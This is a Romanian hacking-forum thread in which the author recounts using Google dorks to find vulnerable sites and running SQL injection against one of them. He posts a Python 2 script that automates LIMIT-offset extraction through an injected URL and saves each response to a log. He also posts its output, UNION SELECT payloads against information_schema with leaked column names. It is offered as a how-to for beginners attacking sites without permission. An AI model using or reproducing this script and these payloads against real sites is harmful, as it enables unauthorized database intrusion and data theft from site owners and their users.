Jump to content
Flubber

De ce a stii un limbaj de programare este folositor?

By Flubber, in Off-topic

Recommended Posts

Flubber Newbie

Flubber

Posted
Posted

Ei bine, cand am invatat si eu cat de cat Python, m-am tot intrebat cand o sa imi vina la indemana, la inceput mi s-a parut o pierdere de timp, invatand numai operatii matematice, liste, definirea obiectelor, modulelor, input-uri ale user-ului si alte vrajeli (asta din niste tutoriale video de pe YouTube), au fost intr-un fel OK, pana la un anumit moment cand devenisem sa ma simt frustrat (pur si simplu pentru faptul ca totul parea newbish -- voiam deja sa pun in aplicare cunostintele dobandite, sa mi se dovedeasca a fi folositoare, sa imi demonstrez ca nu a fost o pierdere de timp), pana cand am citit de pe site (cel oficial Python docs) niste articole, la inceputul inceputurilor (cand am vizionat clipurile respective pe YT) mi s-au parut grele sau plictisitoare, acum avand un habar despre ce este vorba mi-au fost de ajutor ceva mai mult. Despre ce cacat vorbesc eu aici? Recent, facand niste SQLi folosindu-ma de dork-uri cu prietenul magic Google (da da, sunt un lamer, 'vai faci SQLi folosindu-te de dork-uri, asa, dai la gramada si ce iti vine pe mana dai deface sa te dai mare hec?r' -- nu asa sta treaba), am dat peste un site ce afisa in sursa. Pagina respectiva pe care browser-ul minunat Firefox o interpreta dupa tag-urile HTML nu afisa nimic ciudat, ci eroarea propriu-zisa MySQL. Facand mai multe incercari la baza MySQL mereu mi se returna eroarea magica foarte aiurea. Aruncand un ochi in acea sursa am observat ca intr-un string "rtmp://" scria versiunea, sau ma rog "raspunsul" interogarii mele. Ei bine aici a intervenit partea in care Python (oh, te iubesc!) mi-a fost de ajutor. Folosindu-ma de LIMIT (cu totii uram asta, cel putin eu la greu) am observat ca imi arata in sursa corespunzator, la LIMIT 0,1 "rtmp://rahat", la LIMIT 1,1 "rtmp://alt_rahat" si asa mai departe, automatizarea acestui moment mi-a economisit o gramada de timp. 


import urllib

def rahat():
    print "# Coded by Flubber -2010- with help from cmiN -- thanks.\r\n"
    victima = raw_input("[?] Site: ")
    victima = "http://" + victima.replace("http://", "")
    print "[+] Site-ul este: " + '"' + str(victima) + '"' + ".\r\n"
    rangeA = input("[?] LIMIT range (exemplu: 50 va face de la LIMIT de la 0 la 50): ")
    print "[+] LIMIT range-ul a fost setat la: " + '"' + str(rangeA) + '"' + ".\r\n"
    print '[!] Acum setam back end string, lasa liber pentru a nu seta.'
    backend = raw_input("[?] Back end string: ")
    if backend == "":
        backend = ""
    else:
        print "[+] Back end-ul este: " + '"' + backend + '"' + "."
    print '\r\n[!] Acum setam logfile-ul (exemplu: "gigi.txt"), lasa liber pentru a seta default ("logz0r.txt").'
    logfile = raw_input("[?] Logfile: ")
    if logfile == "":
        logfile = "logz0r.txt"
    print "[+] Output-ul va fi scris in urmatorul fisier: " + '"' + logfile + '"' +".\r\n"
    for x in range(rangeA + 1)[:]:
        victimaB = victima + " LIMIT " + str(x) + ",1" + backend
        socket = urllib.urlopen(victimaB)
        source = socket.read()
        socket.close
        a = open(logfile, 'a')
        a.write("#"*10 + "\r\n" + victimaB + "#"*10 + "\r\n")
        a.write("##" + str(x) + "\r\n" + "#"*10 + "\r\n" + source + "\r\n\r\n\r\n\r\n\r\n")
        a.close()
        print "[LIMIT " + str(x) + ",1]:" , '"' + victimaB + '"' + ".\r\n"

rahat()

Script-ul de mai sus nu face decat sa ia sursa paginii si sa o salveze intr-un log. Bineinteles, sursa paginii care este apelata cu adresa RAHAT LIMIT 0,1 1,1 2,1 etc. (scuzati daca m-am exprimat gresit, intelegeti voi ce vreau sa zic). Bineinteles, script-ul l-am "confectionat" nevoilor mele, nu este unul care se poate folosii la orice site (cum ar fi sqlmap), interesant insa a fost faptul cand am observat ca interogarea nu avea succes daca adresa nu avea la sfarsit &type=flv, interogarea fiind SINTAXA/*&type=flv, momentul acela insemnand implementarea back-end-ului. Nu stiu pentru cati dintre voi este folositoare aceasta informatie, sau tot ce am scris eu aici, pentru mine a fost o experienta mai unica, am mai intalnit site-uri la care raspunsul era in sursa, dar nu in felul acesta. Ma scuzati daca par foarte noob (asta si sunt, si un mare script kiddie, si lamer), nu sunt nicidecum un hacker super geniu, si ma scuzati daca va frustrez cu informatii d-astea foarte joase, precum acest thread, dar sper ca pentru alti incepatori, sau drq stie, sa ii/le fie de folos.

// LE: bah, las-o drq de treaba, ma chinui sa scriu un thread sperand ca este folositor si imi este distrus, toate spatiile, totul codul, la postare, ce naiba se intampla? faceti un fix! patchuiti problema, eu nu am sa stau sa-l rearanjez, este enervant

// LE(2): Oh da, output-ul a fost urmatorul (asa m-am uitat peste tabelele care ma interesau):

##########

http://www.site.com/pagina.php?id=-UN NUMAR DIN MULTE CIFRE union all select 1,concat(column_name),3,4,5,6,7,8,9,10,11,12 from information_schema.columns where table_name=0xHEX LIMIT 12,1/*&type=flv

##########

##12

##########

<html>

<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">

<link rel="stylesheet" type="text/css" href="css/player.css" />

<!--

<link rel="stylesheet" type="text/css" href="css/menu.css" />

<link rel="stylesheet" type="text/css" href="css/webcasts.css">

-->

<script type="text/javascript" src="swfobject.js"></script>

</head>

<title>EX</title>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">

<div align="center"><table cellspacing="0" cellpadding="0" border="0"><tr><td><img src=""></td></tr><tr><td valign="top" align="center"><span class="copy"><br />

<b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>path site</b> on line <b>88</b><br />

<b></b><br>from the project: <br><br></span></td></tr><tr><td><div id="player1" align="center"><script type="text/javascript">var s1 = new SWFObject("flvplayer.swf","single","7","28","7");s1.addParam("allowfullscreen","true");s1.addVariable("file","rtmp://name_author/3/4");s1.addVariable("id","");s1.addVariable("image","9");s1.addVariable("width","7");s1.addVariable("height","28");s1.addVariable("overstretch","fit");s1.write("player1");</script></div></td></tr><tr><td align="right"><span class="copy"><a href="javascript:window.close()"><img src="http://rstcenter.com/forum/images/buttons/popup_close.gif" border="0"></a> </span></td></tr></table></div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">

</script>

<script type="text/javascript">

_uacct = "UA-215568-1";

urchinTracker();

</script>

</body></html>

##########

http://www.site.com/pagina.php?id=-UN NUMAR DIN MULTE CIFRE union all select 1,concat(column_name),3,4,5,6,7,8,9,10,11,12 from information_schema.columns where table_name=0xHEX LIMIT 13,1/*&type=flv

##########

##13

##########

<html>

<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">

<link rel="stylesheet" type="text/css" href="css/player.css" />

<!--

<link rel="stylesheet" type="text/css" href="css/menu.css" />

<link rel="stylesheet" type="text/css" href="css/webcasts.css">

-->

<script type="text/javascript" src="swfobject.js"></script>

</head>

<title>EX</title>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">

<div align="center"><table cellspacing="0" cellpadding="0" border="0"><tr><td><img src=""></td></tr><tr><td valign="top" align="center"><span class="copy"><br />

<b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>path site</b> on line <b>88</b><br />

<b></b><br>from the project: <br><br></span></td></tr><tr><td><div id="player1" align="center"><script type="text/javascript">var s1 = new SWFObject("flvplayer.swf","single","7","28","7");s1.addParam("allowfullscreen","true");s1.addVariable("file","rtmp://affiliation/3/4");s1.addVariable("id","");s1.addVariable("image","9");s1.addVariable("width","7");s1.addVariable("height","28");s1.addVariable("overstretch","fit");s1.write("player1");</script></div></td></tr><tr><td align="right"><span class="copy"><a href="javascript:window.close()"><img src="http://rstcenter.com/forum/images/buttons/popup_close.gif" border="0"></a> </span></td></tr></table></div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">

</script>

<script type="text/javascript">

_uacct = "UA-215568-1";

urchinTracker();

</script>

</body></html>

##########

http://www.site.com/pagina.php?id=-UN NUMAR DIN MULTE CIFRE union all select 1,concat(column_name),3,4,5,6,7,8,9,10,11,12 from information_schema.columns where table_name=0xHEX LIMIT 14,1/*&type=flv

##########

##14

##########

<html>

<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">

<link rel="stylesheet" type="text/css" href="css/player.css" />

<!--

<link rel="stylesheet" type="text/css" href="css/menu.css" />

<link rel="stylesheet" type="text/css" href="css/webcasts.css">

-->

<script type="text/javascript" src="swfobject.js"></script>

</head>

<title>EX</title>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">

<div align="center"><table cellspacing="0" cellpadding="0" border="0"><tr><td><img src=""></td></tr><tr><td valign="top" align="center"><span class="copy"><br />

<b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>path site</b> on line <b>88</b><br />

<b></b><br>from the project: <br><br></span></td></tr><tr><td><div id="player1" align="center"><script type="text/javascript">var s1 = new SWFObject("flvplayer.swf","single","7","28","7");s1.addParam("allowfullscreen","true");s1.addVariable("file","rtmp://email_author/3/4");s1.addVariable("id","");s1.addVariable("image","9");s1.addVariable("width","7");s1.addVariable("height","28");s1.addVariable("overstretch","fit");s1.write("player1");</script></div></td></tr><tr><td align="right"><span class="copy"><a href="javascript:window.close()"><img src="http://rstcenter.com/forum/images/buttons/popup_close.gif" border="0"></a> </span></td></tr></table></div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">

</script>

<script type="text/javascript">

_uacct = "UA-215568-1";

urchinTracker();

</script>

</body></html>

Na ca l-am rearanjat putin intr-un final... offf, cat iubesc eu rst-u asta

Aah! quote merge mai bine decat code

Link to comment
Share on other sites
Flubber Newbie

Flubber

Posted
  • Author
Posted
_|_ kwe :)

Apropos, Nytro, daca ti se pare postul a fi un articol bun pentru revista respectiva, pot participa, daca doresti il pot reformula, bineinteles, folosind alti termeni si mai intai o introducere proprie facand referire la baza de date MySQL, etc.

// P.S.: desi sincer nu prea le am fiindca nu m-am jucat cu MySQL deloc - da, exact, nu am instalat nicaieri si nici nu am "poke-uit-o" sa vad despre ce e vorba, la site-uri sunt praf, asa ca daca cineva mai experimentat s-ar oferii sa implementeze post-ul undeva sau sa-l reformuleze specificand anumite chestii ,explicandu-le mai bine... nicio problema...

cheerz

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...